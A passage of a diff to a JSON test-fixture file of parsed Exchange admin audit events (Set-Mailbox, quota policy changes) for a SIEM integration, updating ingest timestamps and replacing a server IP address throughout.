@@ -7145,8 +7145,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177831100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853449600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -7166,12 +7166,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -7203,7 +7203,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -7215,8 +7215,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177834400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853454200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -7236,12 +7236,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -7281,7 +7281,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -7293,8 +7293,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177837200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853460100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7314,12 +7314,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7362,7 +7362,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -7374,8 +7374,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177840100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853465900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -7395,12 +7395,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -7432,7 +7432,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -7444,8 +7444,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177843Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853471600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7465,12 +7465,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7513,7 +7513,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -7525,8 +7525,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177845700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853475500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -7546,12 +7546,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -7596,7 +7596,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -7608,8 +7608,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177850700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853480200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
